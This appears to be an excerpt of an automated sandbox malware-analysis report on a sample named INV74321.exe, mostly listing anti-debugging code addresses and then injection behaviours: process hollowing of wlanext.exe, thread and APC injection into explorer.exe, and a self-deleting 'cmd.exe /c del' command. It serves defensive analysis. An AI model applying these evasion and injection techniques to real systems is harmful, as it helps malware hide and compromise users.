          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]1_2_00BA05AC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]1_2_00B0FD9B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]1_2_00B0FD9B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B88DF1 mov eax, dword ptr fs:[00000030h]1_2_00B88DF1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9E539 mov eax, dword ptr fs:[00000030h]1_2_00B9E539
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B5A537 mov eax, dword ptr fs:[00000030h]1_2_00B5A537
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8D34 mov eax, dword ptr fs:[00000030h]1_2_00BA8D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAD30 mov eax, dword ptr fs:[00000030h]1_2_00ADAD30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]1_2_00AFC577
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]1_2_00AFC577
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B13D43 mov eax, dword ptr fs:[00000030h]1_2_00B13D43
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53540 mov eax, dword ptr fs:[00000030h]1_2_00B53540
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF7D50 mov eax, dword ptr fs:[00000030h]1_2_00AF7D50
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B546A7 mov eax, dword ptr fs:[00000030h]1_2_00B546A7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FE87 mov eax, dword ptr fs:[00000030h]1_2_00B6FE87
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE76E2 mov eax, dword ptr fs:[00000030h]1_2_00AE76E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B016E0 mov ecx, dword ptr fs:[00000030h]1_2_00B016E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]1_2_00BA8ED6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B18EC7 mov eax, dword ptr fs:[00000030h]1_2_00B18EC7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B8FEC0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B036CC mov eax, dword ptr fs:[00000030h]1_2_00B036CC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FE3F mov eax, dword ptr fs:[00000030h]1_2_00B8FE3F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADE620 mov eax, dword ptr fs:[00000030h]1_2_00ADE620
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]1_2_00B0A61C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]1_2_00B0A61C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B08E00 mov eax, dword ptr fs:[00000030h]1_2_00B08E00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91608 mov eax, dword ptr fs:[00000030h]1_2_00B91608
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE766D mov eax, dword ptr fs:[00000030h]1_2_00AE766D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]1_2_00B9AE44
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]1_2_00B9AE44
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8794 mov eax, dword ptr fs:[00000030h]1_2_00AE8794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B137F5 mov eax, dword ptr fs:[00000030h]1_2_00B137F5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0E730 mov eax, dword ptr fs:[00000030h]1_2_00B0E730
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]1_2_00AD4F2E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]1_2_00AD4F2E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]1_2_00B6FF10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]1_2_00B6FF10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]1_2_00BA070D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]1_2_00BA070D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFF716 mov eax, dword ptr fs:[00000030h]1_2_00AFF716
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]1_2_00B0A70E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]1_2_00B0A70E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEFF60 mov eax, dword ptr fs:[00000030h]1_2_00AEFF60
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8F6A mov eax, dword ptr fs:[00000030h]1_2_00BA8F6A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEEF40 mov eax, dword ptr fs:[00000030h]1_2_00AEEF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380138A mov eax, dword ptr fs:[00000030h]8_2_0380138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]8_2_03773B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]8_2_03773B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB60 mov ecx, dword ptr fs:[00000030h]8_2_0374DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03815BA5 mov eax, dword ptr fs:[00000030h]8_2_03815BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F358 mov eax, dword ptr fs:[00000030h]8_2_0374F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB40 mov eax, dword ptr fs:[00000030h]8_2_0374DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380131B mov eax, dword ptr fs:[00000030h]8_2_0380131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376DBE9 mov eax, dword ptr fs:[00000030h]8_2_0376DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]8_2_037C53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]8_2_037C53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818B58 mov eax, dword ptr fs:[00000030h]8_2_03818B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772397 mov eax, dword ptr fs:[00000030h]8_2_03772397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377B390 mov eax, dword ptr fs:[00000030h]8_2_0377B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]8_2_03751B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]8_2_03751B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FD380 mov ecx, dword ptr fs:[00000030h]8_2_037FD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378927A mov eax, dword ptr fs:[00000030h]8_2_0378927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]8_2_037FB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]8_2_037FB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D4257 mov eax, dword ptr fs:[00000030h]8_2_037D4257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]8_2_03784A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]8_2_03784A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]8_2_0374AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]8_2_0374AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov ecx, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03763A1C mov eax, dword ptr fs:[00000030h]8_2_03763A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758A0A mov eax, dword ptr fs:[00000030h]8_2_03758A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772AE4 mov eax, dword ptr fs:[00000030h]8_2_03772AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]8_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]8_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772ACB mov eax, dword ptr fs:[00000030h]8_2_03772ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]8_2_0375AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]8_2_0375AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FAB0 mov eax, dword ptr fs:[00000030h]8_2_0377FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380EA55 mov eax, dword ptr fs:[00000030h]8_2_0380EA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]8_2_0377D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]8_2_0377D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818A62 mov eax, dword ptr fs:[00000030h]8_2_03818A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]8_2_0374B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]8_2_0374B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C962 mov eax, dword ptr fs:[00000030h]8_2_0374C962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]8_2_0376B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]8_2_0376B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]8_2_0377513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]8_2_0377513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov ecx, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D41E8 mov eax, dword ptr fs:[00000030h]8_2_037D41E8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]8_2_037761A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]8_2_037761A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C69A6 mov eax, dword ptr fs:[00000030h]8_2_037C69A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772990 mov eax, dword ptr fs:[00000030h]8_2_03772990
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A185 mov eax, dword ptr fs:[00000030h]8_2_0377A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C182 mov eax, dword ptr fs:[00000030h]8_2_0376C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]8_2_03760050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]8_2_03760050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Users\user\Desktop\INV74321.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\INV74321.exe Section loaded: unknown target: C:\Users\user\Desktop\INV74321.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV74321.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\INV74321.exe Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\INV74321.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\INV74321.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: D90000
          Source: C:\Users\user\Desktop\INV74321.exe Process created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: explorer.exe, 00000005.00000002.473046481.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.238911410.000000000871F000.00000004.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.220866561.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000008.00000002.475564298.0000000005E50000.00000002.00000001.sdmp Binary or memory string: Progmanlock
